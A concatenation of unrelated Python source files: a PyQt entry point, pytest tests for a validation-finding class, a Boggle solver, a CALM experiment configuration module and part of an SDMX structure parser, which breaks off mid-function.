# `setup_form` is visible to ContractionDetector.processamento_clicked.
app = QApplication(sys.argv)
setup_form = SetupApp()
form = ContractionDetector()
def main():
    """Show the main window and enter the Qt event loop."""
    form.show()
    app.exec_()
if __name__ == "__main__":
    main()
|
import pytest
from ._core import No_Exception
from .. import finding
def test_OK_finding_type():
    """finding.OK must be a ValidationResultStatus instance."""
    ok_status = finding.OK
    assert isinstance(ok_status, finding.ValidationResultStatus)
@pytest.mark.parametrize(
    "h5_address, test_name, status, comment, xceptn",
    [
        [None, None, "exception", None, ValueError],
        [None, None, "Ok", None, ValueError],
        [None, None, finding.OK, None, No_Exception],
    ],
)
def test_exception(h5_address, test_name, status, comment, xceptn):
    """Finding() must reject statuses that are not ValidationResultStatus.

    The No_Exception sentinel marks the success path: when construction
    succeeds we raise it, so pytest.raises(No_Exception) passes.
    """
    with pytest.raises(xceptn):
        try:
            finding.Finding(h5_address, test_name, status, comment)
        except xceptn:
            # Expected failure: re-raise so pytest.raises sees it.
            raise xceptn
        else:
            # Construction succeeded: signal success via the sentinel.
            raise No_Exception
@pytest.mark.parametrize(
    "addr, test_name, status, comment",
    [
        [None, None, finding.ERROR, None],
        ["h5_address", "test_name", finding.NOTE, "comment"],
        ["A", "this", finding.OK, "looks good"],
    ]
)
def test_Finding_str(addr, test_name, status, comment):
    """str(Finding) must follow the canonical repr-style format."""
    expect = f"finding.Finding({addr}, {test_name}, finding.{status}, {comment})"
    f = finding.Finding(addr, test_name, status, comment)
    assert f is not None
    assert str(f) == expect
def test_standard():
    """Sanity-check the module-level status tables."""
    assert len(finding.VALID_STATUS_LIST) == 8
    assert len(finding.VALID_STATUS_DICT) == len(finding.VALID_STATUS_LIST)
    # TF_RESULT must be keyed exactly by the two booleans.
    tf_keys = sorted(str(k) for k in finding.TF_RESULT.keys())
    expected = sorted(str(b) for b in (False, True))
    assert tf_keys == expected
@pytest.mark.parametrize(
    "addr, test_name, status, comment",
    [
        [None, None, finding.ERROR, None],
        ["h5_address", "test_name", finding.NOTE, "comment"],
        ["A", "this", finding.OK, "looks good"],
    ]
)
def test_Finding_make_md5(addr, test_name, status, comment):
    """make_md5 requires an address; the digest is a stable hex string."""
    f = finding.Finding(addr, test_name, status, comment)
    if addr is None:
        # Hashing a missing address must fail.
        with pytest.raises(TypeError):
            f.make_md5()
        return
    digest = f.make_md5()
    assert isinstance(digest, str)  # is str?
    assert isinstance(int(digest, 16), int)  # is hexadecimal?
    # can be duplicated from same inputs (is NOT random)?
    assert digest == f.make_md5()
|
"""
File: boggle.py
Name: Tao Ke Chorng
----------------------------------------
TODO:
"""
# This is the file name of the dictionary txt file
# we will be checking if a word exists by searching through it
FILE = 'dictionary.txt'
word = []  # all dictionary words, filled by read_dictionary()
alpha = 'qwertyuioplkjhgfdsaxzcvbnm'  # every lowercase letter (keyboard order)
counter = 1  # row number shown in the input prompt
row_of_letter = []  # the 16 board letters in row-major order
num_of_words = 0  # running count of found words
printed_words = []  # store already printed words
def main():
    """
    Read a 4x4 Boggle board from user input (four rows of four
    space-separated letters), search it for every dictionary word of
    length >= 4, print each match once, and report the total count.
    """
    global counter
    read_dictionary()
    count = 1
    # the while loop ask user to in put 4 rows of letters, and see it's legal or not
    while True:
        row = input(f'{counter} row of letters: ')
        row = row.lower()
        # A legal row is "a b c d": letters at even indices, spaces between.
        if len(row) >= 7:
            if row[0] in alpha and row[2] in alpha and row[4] in alpha and row[6] in alpha:
                if row[1] == ' ' and row[3] == ' ' and row[5] == ' ':
                    counter += 1
                    # Keep the letters (even indices); skip the separators.
                    for j in range(len(row)):
                        if j % 2 == 0:
                            row_of_letter.append(row[j])
                    count += 1
                    if count > 4:
                        break
                else:
                    print('Illegal input')
            else:
                print('Illegal input')
        else:
            print('Illegal input')
    # Split the flat 16-letter list into the four board rows.
    row1 = row_of_letter[:4]
    row2 = row_of_letter[4:8]
    row3 = row_of_letter[8:12]
    row4 = row_of_letter[12:16]
    board = [row1, row2, row3, row4]
    # these two loops will loop over every start position to find a word
    for y in range(4):
        for x in range(4):
            maybe_word = board[x][y]  # the start position to find a word
            find_word(board, x, y, maybe_word, [(x, y)])
    print(f'There are {num_of_words} words in total.')
def find_word(board, x, y, maybe_word, index_lst):
    """
    Recursively extend ``maybe_word`` with unused neighboring letters and
    print every dictionary word (length >= 4) found, using
    choose/explore/un-choose backtracking.

    :param board: a list that store all four rows
    :param x: the x position of a alphabet
    :param y: the y position of a alphabet
    :param maybe_word: to see the combination of alphabet is in dictionary or not
    :param index_lst: the index position of a alphabet
    :return: None
    """
    global num_of_words
    if maybe_word in word and len(maybe_word) >= 4:
        if maybe_word not in printed_words:
            printed_words.append(maybe_word)
            print(f'Found \"{maybe_word}\"')
            num_of_words += 1
    # Only recurse while some dictionary word still starts with maybe_word.
    if has_prefix(maybe_word):
        for i in range(-1, 2):
            for j in range(-1, 2):
                # Stay on the board and never reuse a cell.
                if 0 <= x + i < 4 and 0 <= y + j < 4:
                    if (x + i, y + j) not in index_lst:
                        # choose
                        index_lst.append((x + i, y + j))
                        maybe_word += board[x + i][y + j]
                        # Explore
                        find_word(board, x + i, y + j, maybe_word, index_lst)
                        # un-choose
                        maybe_word = maybe_word[:len(maybe_word)-1]
                        index_lst.pop()
def read_dictionary():
    """Load every line of FILE (one word per line) into the global ``word`` list."""
    with open(FILE, 'r') as dict_file:
        word.extend(entry.strip() for entry in dict_file)
def has_prefix(sub_s):
    """
    :param sub_s: (str) A substring that is constructed by neighboring letters on a 4x4 square grid
    :return: (bool) True if any dictionary word starts with sub_s, else False
    """
    # any() short-circuits at the first match and returns an explicit bool;
    # the original fell off the end and returned None when nothing matched.
    return any(w.startswith(sub_s) for w in word)
# Script entry point.
if __name__ == '__main__':
    main()
|
from . import sample_data, tests
from .data_structures import (
StreamDataset,
StreamGrid,
StreamHandler,
StreamHierarchy,
hexahedral_connectivity,
)
from .fields import StreamFieldInfo
from .io import IOHandlerStream
|
"""
CALM
Copyright (c) 2021-present NAVER Corp.
MIT license
"""
import argparse
import munch
import importlib
import os
from os.path import join as ospj
import shutil
from util import Logger
# Valid values for the argparse `choices=` options defined in get_configs().
_DATASET_NAMES = ('CUB', 'ILSVRC', 'OpenImages')
_ARCHITECTURE_NAMES = ('vgg16', 'resnet50', 'inception_v3')
_ATTRIBUTION_METHODS = ('CAM', 'CALM-EM', 'CALM-ML')
_SCORE_MAP_METHOD_NAMES = ('activation_map', 'backprop')
_SCORE_MAP_PROCESS_NAMES = (
    'vanilla', 'vanilla-saliency', 'vanilla-superclass',
    'jointll', 'jointll-superclass', 'jointll-superclass-mean',
    'gtcond', 'gtcond-superclass', 'gtcond-superclass-mean',
    'saliency',
    'input_grad', 'integrated_grad', 'smooth_grad', 'var_grad')
_NORM_TYPES = ('max', 'minmax', 'clipping')
_THRESHOLD_TYPES = ('even', 'log')
_SPLITS = ('train', 'val', 'test')
# Trailing comma makes this a 1-tuple; without it the parenthesized string
# made `choices=` accept any substring of 'PythonLogger'.
_LOGGER_TYPE = ('PythonLogger',)
def mch(**kwargs):
    """Shorthand: build a Munch (attribute-style dict) from keyword args."""
    return munch.Munch(**kwargs)
def str2bool(v):
    """Parse a boolean-ish CLI string; raise ArgumentTypeError otherwise."""
    token = v.lower()
    if token in {'yes', 'true', 't', 'y', '1'}:
        return True
    if token in {'no', 'false', 'f', 'n', '0'}:
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
def configure_data_paths(args):
    """Return a Munch bundling the train/val/test image roots for the dataset."""
    paths = set_data_path(dataset_name=args.dataset_name,
                          data_root=args.data_root)
    train, val, test = paths
    return mch(train=train, val=val, test=test)
def set_data_path(dataset_name, data_root):
    """Return the (train, val, test) image roots for a known dataset name.

    :raises ValueError: for dataset names other than ILSVRC/CUB/OpenImages
    """
    if dataset_name == 'ILSVRC':
        shared = ospj(data_root, dataset_name)
        return shared, ospj(data_root, 'ImageNetV2'), shared
    if dataset_name == 'CUB':
        shared = ospj(data_root, dataset_name, 'images')
        return shared, ospj(data_root, 'CUBV2'), shared
    if dataset_name == 'OpenImages':
        shared = ospj(data_root, dataset_name)
        return shared, shared, shared
    raise ValueError("Dataset {} unknown.".format(dataset_name))
def configure_mask_root(args):
    """Masks always live under the OpenImages subfolder of args.mask_root."""
    return ospj(args.mask_root, 'OpenImages')
def configure_log_folder(args):
    """Create (or recreate) the experiment log directory and return its path.

    :raises RuntimeError: directory already exists and override_cache is off
    """
    log_folder = ospj(args.save_root, args.experiment_name)
    if os.path.isdir(log_folder):
        if not args.override_cache:
            raise RuntimeError("Experiment with the same name exists: {}"
                               .format(log_folder))
        # Caller explicitly asked to wipe the previous run.
        shutil.rmtree(log_folder, ignore_errors=True)
    os.makedirs(log_folder)
    return log_folder
def configure_log(args):
    """Route the project Logger to <log_folder>/log.log."""
    Logger(ospj(args.log_folder, 'log.log'))
def configure_reporter(args):
    """Resolve util.Reporter and ensure its report directory exists."""
    report_dir = ospj(args.log_folder, 'reports')
    if not os.path.isdir(report_dir):
        os.makedirs(report_dir)
    reporter_cls = importlib.import_module('util').Reporter
    return reporter_cls, report_dir
def configure_pretrained_path(args):
    """No pretrained checkpoint is configured; kept for interface symmetry."""
    return None
def get_configs():
    """Parse the CLI, derive dependent paths/objects, and return the args.

    Side effects: creates the log folder, attaches the Logger, and creates
    the reporter's output directory.
    """
    parser = argparse.ArgumentParser()
    # Util
    parser.add_argument('--seed', type=int)
    parser.add_argument('--experiment_name', type=str, default='result')
    parser.add_argument('--override_cache', type=str2bool, nargs='?',
                        const=True, default=False)
    parser.add_argument('--workers', default=4, type=int,
                        help='number of data loading workers (default: 4)')
    parser.add_argument('--use_load_checkpoint', type=str2bool, nargs='?',
                        const=True, default=False)
    parser.add_argument('--load_checkpoint', type=str, default=None,
                        help='folder name for loading ckeckpoint')
    parser.add_argument('--is_different_checkpoint', type=str2bool,
                        nargs='?', const=True, default=False)
    parser.add_argument('--save_root', type=str, default='save')
    parser.add_argument('--logger_type', type=str,
                        default='PythonLogger', choices=_LOGGER_TYPE)
    # Data
    parser.add_argument('--dataset_name', type=str, default='CUB',
                        choices=_DATASET_NAMES)
    parser.add_argument('--data_root', metavar='/PATH/TO/DATASET',
                        default='dataset/',
                        help='path to dataset images')
    parser.add_argument('--metadata_root', type=str, default='metadata/')
    parser.add_argument('--mask_root', metavar='/PATH/TO/MASKS',
                        default='dataset/',
                        help='path to masks')
    parser.add_argument('--proxy_training_set', type=str2bool, nargs='?',
                        const=True, default=False,
                        help='Efficient hyper_parameter search with a proxy '
                             'training set.')
    # Setting
    # NOTE(review): default 'resnet18' is not in _ARCHITECTURE_NAMES; argparse
    # does not validate defaults against `choices`, so this slips through --
    # confirm the intended default.
    parser.add_argument('--architecture', default='resnet18',
                        choices=_ARCHITECTURE_NAMES,
                        help='model architecture: ' +
                             ' | '.join(_ARCHITECTURE_NAMES) +
                             ' (default: resnet18)')
    parser.add_argument('--attribution_method', type=str, default='CAM',
                        choices=_ATTRIBUTION_METHODS)
    parser.add_argument('--is_train', type=str2bool, nargs='?',
                        const=True, default=True)
    parser.add_argument('--epochs', default=40, type=int,
                        help='number of total epochs to run')
    parser.add_argument('--pretrained', type=str2bool, nargs='?',
                        const=True, default=True,
                        help='Use pre_trained model.')
    parser.add_argument('--cam_curve_interval', type=float, default=.001,
                        help='CAM curve interval')
    parser.add_argument('--resize_size', type=int, default=256,
                        help='input resize size')
    parser.add_argument('--crop_size', type=int, default=224,
                        help='input crop size')
    # Common hyperparameters
    parser.add_argument('--batch_size', default=64, type=int,
                        help='Mini-batch size (default: 256), this is the total'
                             'batch size of all GPUs on the current node when'
                             'using Data Parallel or Distributed Data Parallel')
    parser.add_argument('--lr', default=0.01, type=float,
                        help='initial learning rate', dest='lr')
    parser.add_argument('--lr_decay_frequency', type=int, default=30,
                        help='How frequently do we decay the learning rate?')
    parser.add_argument('--lr_classifier_ratio', type=float, default=10,
                        help='Multiplicative factor on the classifier layer.')
    parser.add_argument('--momentum', default=0.9, type=float,
                        help='momentum')
    parser.add_argument('--weight_decay', default=1e-4, type=float,
                        help='weight decay (default: 1e-4)',
                        dest='weight_decay')
    parser.add_argument('--use_bn', type=str2bool, nargs='?',
                        const=True, default=False)
    parser.add_argument('--large_feature_map', type=str2bool, nargs='?',
                        const=True, default=False)
    parser.add_argument('--iou_thresholds', nargs='+',
                        type=int, default=[30, 50, 70])
    # Method-specific hyperparameters
    parser.add_argument('--smoothing_ksize', type=int, default=1)
    parser.add_argument('--score_map_method', type=str, default='activation_map',
                        choices=_SCORE_MAP_METHOD_NAMES)
    parser.add_argument('--score_map_process', type=str, default='vanilla',
                        choices=_SCORE_MAP_PROCESS_NAMES)
    parser.add_argument('--norm_type', default='minmax', type=str,
                        choices=_NORM_TYPES)
    parser.add_argument('--threshold_type', default='even', type=str,
                        choices=_THRESHOLD_TYPES)
    parser.add_argument('--smooth_grad_nr_iter', type=int, default=50,
                        help='SmoothGrad number of sampling')
    parser.add_argument('--smooth_grad_sigma', type=float, default=4.0,
                        help='SmoothGrad sigma multiplier')
    parser.add_argument('--integrated_grad_nr_iter', type=int, default=50,
                        help='IntegratedGradient number of steps')
    args = parser.parse_args()
    # Derived configuration: every helper below reads fields set above.
    args.log_folder = configure_log_folder(args)
    configure_log(args)
    args.data_root = args.data_root.strip('"')
    args.data_paths = configure_data_paths(args)
    args.metadata_root = ospj(args.metadata_root, args.dataset_name)
    args.mask_root = configure_mask_root(args)
    args.reporter, args.reporter_log_root = configure_reporter(args)
    args.pretrained_path = configure_pretrained_path(args)
    return args
|
import copy
from sdmxthon.model.base import InternationalString, LocalisedString, \
Annotation
from sdmxthon.model.component import Component, Dimension, TimeDimension, \
Attribute, PrimaryMeasure
from sdmxthon.model.definitions import DataStructureDefinition, \
DataFlowDefinition, ContentConstraint, DataKeySet, \
MemberSelection, CubeRegion
from sdmxthon.model.descriptors import DimensionDescriptor, \
AttributeDescriptor, MeasureDescriptor, GroupDimensionDescriptor
from sdmxthon.model.header import Contact
from sdmxthon.model.itemScheme import Agency, AgencyScheme, Codelist, Code, \
Item, ConceptScheme, Concept
from sdmxthon.model.representation import Representation, Facet
from sdmxthon.model.utils import FacetType
from sdmxthon.utils.handlers import add_list, unique_id
from sdmxthon.utils.mappings import Locale_Codes
from sdmxthon.utils.parsing_words import ORGS, AGENCIES, AGENCY, ID, \
AGENCY_ID, VERSION, NAME, DESC, LANG, XML_TEXT, URI, EMAIL, ROLE, \
DEPARTMENT, TELEPHONE, FAX, CONTACT, MAINTAINER, CODELISTS, CL, \
CODE, CONCEPTS, CS, CON, ANNOTATIONS, ANNOTATION, ANNOTATION_TITLE, \
TITLE, ANNOTATION_TYPE, TYPE_, ANNOTATION_TEXT, TEXT, CORE_REP, \
CORE_REP_LOW, ENUM, REF, XMLNS, ENUM_FORMAT, TEXT_FORMAT, \
TEXT_TYPE, TEXT_TYPE_LOW, FACETS, DSDS, DSD, DSD_COMPS, DIM_LIST, \
ATT_LIST, ME_LIST, GROUP, DIM_LIST_LOW, ATT_LIST_LOW, ME_LIST_LOW, DIM, \
TIME_DIM, ATT, COMPS, CON_ID, PAR_ID, PAR_VER, CS_LOW, LOCAL_REP, \
LOCAL_REP_LOW, ATT_REL, REL_TO, PRIM_MEASURE, DATAFLOWS, ANNOTATION_URL, \
URL, CON_ID_LOW, PARENT, GROUP_DIM_LOW, GROUP_DIM, DIM_REF, DF, \
STRUCTURE, STR_URL, STR_URL_LOW, SER_URL, SER_URL_LOW, CONSTRAINTS, \
CON_CONS, CONS_ATT, DATA_KEY_SET, DATA_KEY_SET_LOW, CUBE_REGION, \
KEY_VALUE, KEY, VALUE, TYPE, INCLUDED, INCLUDE, CONTENT_REGION
# Dispatch tables mapping parsed SDMX node names to model classes.
schemes_classes = {CL: Codelist, AGENCIES: AgencyScheme, CS: ConceptScheme}
items_classes = {AGENCY: Agency, CODE: Code, CON: Concept}
comp_lists_classes = {DIM_LIST: DimensionDescriptor,
                      ATT_LIST: AttributeDescriptor,
                      ME_LIST: MeasureDescriptor,
                      GROUP: GroupDimensionDescriptor}
comp_classes = {DIM: Dimension,
                TIME_DIM: TimeDimension,
                ATT: Attribute,
                PRIM_MEASURE: PrimaryMeasure}
comp_lists_names = {DIM_LIST: DIM_LIST_LOW,
                    ATT_LIST: ATT_LIST_LOW,
                    ME_LIST: ME_LIST_LOW}
comp_lists_items = {DIM_LIST: [DIM, TIME_DIM],
                    ATT_LIST: [ATT],
                    ME_LIST: [PRIM_MEASURE]}
# Per-DSD scratch state; cleared at the start of each DSD parse.
dimensions = {}
measures = {}
groups = {}
# Global dict to be used in all elements
agencies = {}
codelists = {}
concepts = {}
datastructures = {}
dataflows = {}
# Errors
errors = []  # accumulated validation-error dicts (Code/ErrorLevel/ObjectID/...)
missing_rep = {"CON": [], "CS": [], "CL": []}  # unresolved references by kind
dsd_id = ""  # id of the DSD currently being parsed (used in error messages)
def create_int_str(json_int) -> InternationalString:
    """Build an InternationalString from one or more parsed text nodes.

    ``json_int`` may be a single dict or a list of dicts, each carrying a
    language code (LANG) and the raw text (XML_TEXT).
    """
    json_int = add_list(json_int)
    locals_list = []
    for e in json_int:
        if e[XML_TEXT].strip() not in ['', '\n']:
            # Collapse runs of whitespace/newlines into single spaces.
            e[XML_TEXT] = " ".join(e[XML_TEXT].split())
        locals_list.append(LocalisedString(locale=Locale_Codes[e[LANG]],
                                           label=e[LANG],
                                           content=e[XML_TEXT]))
    return InternationalString(localisedStrings=locals_list)
def create_contact(json_contact) -> Contact:
    """Build a Contact, normalizing its fields to lowercase keys in place.

    NAME/DEPARTMENT/ROLE become InternationalStrings; URI/EMAIL/TELEPHONE/FAX
    are coerced to lists.
    """
    node_int = [NAME, DEPARTMENT, ROLE]
    node_str = [URI, EMAIL, TELEPHONE, FAX]
    for e in node_int:
        if e in json_contact:
            json_contact[e.lower()] = create_int_str(json_contact[e])
            del json_contact[e]
    for e in node_str:
        if e in json_contact:
            json_contact[e.lower()] = add_list(json_contact.pop(e))
    return Contact(**json_contact)
def format_name_description(element: any):
    """Convert NAME/DESC text nodes in place to InternationalStrings under lowercase keys."""
    for key in (NAME, DESC):
        if key in element:
            element[key.lower()] = create_int_str(element.pop(key))
    return element
def format_id(element: any):
    """Rename the ID key to 'id_' so it matches the model constructors' kwarg."""
    element[ID + '_'] = element.pop(ID)
    return element
def format_maintainer(element: any):
    """Replace the AGENCY_ID key with a MAINTAINER Agency object.

    Uses the globally collected ``agencies`` when the id is known; otherwise
    builds a placeholder Agency from the raw id.
    """
    if element[AGENCY_ID] in agencies:
        element[MAINTAINER] = agencies[element[AGENCY_ID]]
    else:
        element[MAINTAINER] = Agency(element[AGENCY_ID])
    del element[AGENCY_ID]
    return element
def format_annotations(item_elem: any):
    """Convert an ANNOTATIONS node into a list of Annotation objects.

    Parsed keys (AnnotationTitle/Type/Text/URL) are renamed to the kwargs the
    Annotation model expects; the list replaces the raw node under the
    lowercase 'annotations' key.
    """
    annotations = []
    if ANNOTATIONS in item_elem:
        ann = item_elem[ANNOTATIONS]
        if ANNOTATION in ann:
            ann[ANNOTATION] = add_list(ann[ANNOTATION])
            for e in ann[ANNOTATION]:
                if ANNOTATION_TITLE in e:
                    e[TITLE] = e.pop(ANNOTATION_TITLE)
                if ANNOTATION_TYPE in e:
                    e[TYPE_] = e.pop(ANNOTATION_TYPE)
                if ANNOTATION_TEXT in e:
                    # Annotation text is language-tagged.
                    e[TEXT] = create_int_str(e[ANNOTATION_TEXT])
                    del e[ANNOTATION_TEXT]
                if ANNOTATION_URL in e:
                    e[URL] = e.pop(ANNOTATION_URL)
                annotations.append(Annotation(**e))
        item_elem[ANNOTATIONS.lower()] = annotations
        del item_elem[ANNOTATIONS]
    return item_elem
def format_facets(json_fac) -> dict:
    """Convert a parsed format node into {'facets': [...]} constructor kwargs.

    TEXT_TYPE is lifted out under its lowercase key; every remaining key that
    names a known FacetType becomes a Facet.
    """
    fac = {FACETS: []}
    if json_fac is None:
        return fac
    if TEXT_TYPE in json_fac:
        fac[TEXT_TYPE_LOW] = json_fac.pop(TEXT_TYPE)
    for e in json_fac:
        if e in FacetType:
            fac[FACETS].append(Facet(facetType=e, facetValue=json_fac[e]))
    return fac
def format_representation(json_rep) -> Representation:
    """Build a Representation from an enumeration (codelist ref) and/or facets.

    Unresolvable codelist references are recorded once in
    ``missing_rep['CL']`` and kept as their string id.
    """
    rep = {}
    node = [ENUM_FORMAT, TEXT_FORMAT]
    if ENUM in json_rep:
        data = json_rep[ENUM][REF]
        full_id = unique_id(data[AGENCY_ID], data[ID], data[VERSION])
        if full_id in codelists:
            rep[CL.lower()] = codelists[full_id]
        elif full_id not in missing_rep["CL"]:
            missing_rep["CL"].append(full_id)
            rep[CL.lower()] = full_id
    for e in node:
        if e in json_rep:
            # Merge facet kwargs in with the enumeration (if any).
            rep = {**rep, **format_facets(json_rep[e])}
    return Representation(**rep)
def format_urls(json_elem):
    """Move structure/service URL keys to their lowercase counterparts."""
    for src, dst in ((STR_URL, STR_URL_LOW), (SER_URL, SER_URL_LOW)):
        if src in json_elem:
            json_elem[dst] = json_elem.pop(src)
    return json_elem
def create_item(item_elem, item) -> Item:
    """Build one scheme item (Agency, Code or Concept) from its parsed node.

    Agency-specific contacts and Concept-specific core representations are
    converted; a PARENT reference is flattened to the parent's id.
    """
    if XMLNS in item_elem:
        del item_elem[XMLNS]
    item_elem = format_annotations(item_elem)
    item_elem = format_name_description(item_elem)
    item_elem = format_id(item_elem)
    if CONTACT in item_elem and item == AGENCY:
        item_elem[CONTACT] = add_list(item_elem[CONTACT])
        contacts = []
        for e in item_elem[CONTACT]:
            contacts.append(create_contact(e))
        item_elem[CONTACT.lower() + 's'] = contacts
        del item_elem[CONTACT]
    if CORE_REP in item_elem and item == CON:
        item_elem[CORE_REP_LOW] = format_representation(item_elem[CORE_REP])
        del item_elem[CORE_REP]
    if PARENT in item_elem:
        # Keep only the referenced parent's id.
        item_elem[PARENT.lower()] = item_elem.pop(PARENT)[REF][ID]
    # Dynamic dispatch to the concrete Item subclass.
    return items_classes[item](**item_elem)
def create_scheme(json_elem, scheme, item):
    """Build every item scheme of kind ``scheme`` found in ``json_elem``.

    :param json_elem: parsed parent node possibly holding scheme nodes
    :param scheme: scheme node name (CL, AGENCIES or CS)
    :param item: item node name contained in the scheme (CODE, AGENCY, CON)
    :return: dict mapping unique full ids to scheme instances
    """
    elements = {}
    if scheme in json_elem:
        json_elem[scheme] = add_list(json_elem[scheme])
        for element in json_elem[scheme]:
            if XMLNS in element:
                del element[XMLNS]
            element = format_annotations(element)
            element = format_name_description(element)
            full_id = unique_id(element[AGENCY_ID],
                                element[ID],
                                element[VERSION])
            element = format_urls(element)
            element = format_maintainer(element)
            element = format_id(element)
            if item in element:
                element[item] = add_list(element[item])
                items = []
                for item_elem in element[item]:
                    # Dynamic
                    items.append(create_item(item_elem, item))
                del element[item]
                element['items'] = items
                if scheme == AGENCIES:
                    # Register agencies globally for maintainer resolution.
                    agencies.update({e.id: e for e in items})
            else:
                element['items'] = []
            # Dynamic creation with specific class
            elements[full_id] = schemes_classes[scheme](**element)
    return elements
def create_organisations(json_orgs):
    """Build every AgencyScheme from an organisations node.

    Handles both a single AGENCIES dict and a list of them, merging the
    resulting schemes into one dict keyed by full id.
    """
    orgs = {}
    if AGENCIES in json_orgs:
        if len(json_orgs) == 1 and isinstance(json_orgs[AGENCIES], dict):
            # Single scheme: delegate directly.
            ag_sch = create_scheme(json_orgs, AGENCIES, AGENCY)
            return ag_sch
        for e in json_orgs[AGENCIES]:
            ag_sch = create_scheme(e, AGENCIES, AGENCY)
            orgs = {**orgs, **ag_sch}
    return orgs
def format_con_id(json_ref):
    """Resolve a concept-identity reference against the loaded concept schemes.

    Returns a dict that may carry the resolved Concept (CON) and, when the
    concept has a core representation with a codelist, that codelist too.
    Unresolved scheme/concept ids are recorded in ``missing_rep``.
    """
    rep = {}
    full_cs_id = unique_id(json_ref[AGENCY_ID],
                           json_ref[PAR_ID],
                           json_ref[PAR_VER])
    if full_cs_id in concepts:
        if json_ref[ID] in concepts[full_cs_id].items:
            # rep[CS_LOW] = concepts[full_cs_id]
            rep[CON] = concepts[full_cs_id].items[json_ref[ID]]
            core_rep = concepts[full_cs_id].items[json_ref[ID]]. \
                core_representation
            if core_rep is not None:
                cl = core_rep.codelist
                if cl is not None:
                    rep[CL.lower()] = cl
        elif json_ref[ID] not in missing_rep["CON"]:
            missing_rep["CON"].append(json_ref[ID])
    elif full_cs_id not in missing_rep["CS"]:
        missing_rep["CS"].append(full_cs_id)
    return rep
def format_relationship(json_rel, node=DIM, att_name=None):
    """Resolve an attribute-relationship node to the referenced components.

    Looks the references up in the module-level ``dimensions``, ``measures``
    or ``groups`` dicts; missing targets append MS04/MS05 errors. When no
    known relationship node is present, 'NoSpecifiedRelationship' is returned.

    :param json_rel: parsed AttributeRelationship (or group) node
    :param node: node name to scan for dimension references (default DIM)
    :param att_name: attribute id used in error messages
    """
    rels = {}
    if node in json_rel:
        json_rel[node] = add_list(json_rel[node])
        for e in json_rel[node]:
            # Group nodes wrap the ref in DIM_REF; plain attributes do not.
            if DIM_REF in e:
                element = e[DIM_REF][REF][ID]
            else:
                element = e[REF][ID]
            if element in dimensions:
                rels[element] = dimensions[element]
            else:
                errors.append(
                    {'Code': 'MS04', 'ErrorLevel': 'CRITICAL',
                     'ObjectID': f'{dsd_id}',
                     'ObjectType': 'Attribute',
                     'Message': f'Missing Dimension {e[REF][ID]} '
                                f'related to Attribute '
                                f'{att_name}'})
    elif PRIM_MEASURE in json_rel:
        if json_rel[PRIM_MEASURE][REF][ID] in measures:
            rels = measures[json_rel[PRIM_MEASURE][REF][ID]]
        else:
            errors.append(
                {'Code': 'MS05', 'ErrorLevel': 'CRITICAL',
                 'ObjectID': f'{dsd_id}',
                 'ObjectType': 'Attribute',
                 'Message': 'Missing Primary Measure '
                            f'{json_rel[PRIM_MEASURE][REF][ID]} '
                            f'related to Attribute {att_name}'})
    elif GROUP in json_rel:
        if json_rel[GROUP][REF][ID] in groups:
            rels = groups[json_rel[GROUP][REF][ID]]
    else:
        rels = 'NoSpecifiedRelationship'
    return rels
def format_component(json_comp, comp) -> Component:
    """Build one Component (dimension/attribute/measure) of class ``comp``.

    Resolves the local representation and concept identity, and for
    attributes converts the relationship node.
    """
    rep = {}
    rep_class = None
    if LOCAL_REP in json_comp:
        rep_class = format_representation(json_comp[LOCAL_REP])
        del json_comp[LOCAL_REP]
    if CON_ID in json_comp:
        rep = format_con_id(json_comp[CON_ID][REF])
        if CON in rep:
            json_comp[CON_ID_LOW] = rep.pop(CON)
        del json_comp[CON_ID]
    # NOTE(review): format_con_id's CS_LOW assignment is commented out, so
    # this branch looks dead; if it ever fires with no LOCAL_REP, rep_class
    # is None and this raises AttributeError -- confirm.
    if CS_LOW in rep:
        rep_class.concept_scheme = rep[CS_LOW]
    json_comp[LOCAL_REP_LOW] = rep_class
    # Attribute Handling
    if ATT_REL in json_comp:
        json_comp[REL_TO] = format_relationship(json_comp[ATT_REL],
                                                att_name=json_comp[ID])
        del json_comp[ATT_REL]
    json_comp = format_id(json_comp)
    json_comp = format_annotations(json_comp)
    return comp(**json_comp)
def format_component_lists(json_comp_lists, comp_list, comp):
    """Build a component descriptor (``comp_list``) from its parsed node.

    :param json_comp_lists: parsed DimensionList/AttributeList/MeasureList node
    :param comp_list: descriptor class to instantiate
    :param comp: list of component node names belonging to this descriptor
    """
    components = {}
    json_comp_lists = format_annotations(json_comp_lists)
    json_comp_lists = format_id(json_comp_lists)
    for e in comp:
        if e in json_comp_lists:
            json_comp_lists[e] = add_list(json_comp_lists[e])
            for i in json_comp_lists[e]:
                new_element = format_component(i, comp_classes[e])
                components[new_element.id] = new_element
            del json_comp_lists[e]
    # Register components globally so relationships can resolve them later.
    if comp == comp_lists_items[DIM_LIST]:
        dimensions.update(components)
    elif comp == comp_lists_items[ME_LIST]:
        measures.update(components)
        if len(components) == 0:
            errors.append({'Code': 'MX02', 'ErrorLevel': 'CRITICAL',
                           'ObjectID': f'{dsd_id}', 'ObjectType': 'DSD',
                           'Message': f'DSD {dsd_id} does not have '
                                      f'a Primary Measure'})
    json_comp_lists[COMPS] = components
    return comp_list(**json_comp_lists)
def format_group_dim(json_group):
    """Build a GroupDimensionDescriptor from a parsed Group node.

    The group's components are also registered in the module-level ``groups``
    dict so attribute relationships can reference the group by id.
    """
    if GROUP_DIM in json_group:
        json_group[COMPS] = format_relationship(json_group, GROUP_DIM)
        # Delete only when present: the original deleted unconditionally and
        # raised KeyError for group nodes without a GROUP_DIM child.
        del json_group[GROUP_DIM]
    else:
        json_group[COMPS] = None
    groups.update({json_group[ID]: json_group[COMPS]})
    json_group = format_id(json_group)
    return GroupDimensionDescriptor(**json_group)
def format_dsd_comps(json_comps):
    """Parse the DataStructureComponents node of a DSD.

    Dispatches each child list (dimensions, measures, group, attributes) to
    its formatter and records MX01/MX02 errors when the mandatory dimension
    or measure lists are missing.
    """
    node = [DIM_LIST, ME_LIST, GROUP, ATT_LIST]
    comps = json_comps[DSD_COMPS]
    for e in node:
        if e == GROUP and e in comps:
            json_comps[GROUP_DIM_LOW] = format_group_dim(comps[GROUP])
        elif e in comps:
            name = comp_lists_names[e]
            json_comps[name] = format_component_lists(comps[e],
                                                      comp_lists_classes[e],
                                                      comp_lists_items[e])
        else:
            # Dimension and measure lists are mandatory; groups and
            # attributes are optional and raise no error when absent.
            if e == DIM_LIST:
                errors.append({'Code': 'MX01', 'ErrorLevel': 'CRITICAL',
                               'ObjectID': f'{dsd_id}', 'ObjectType': 'DSD',
                               'Message': f'DSD {dsd_id} does not have '
                                          f'a DimensionList'})
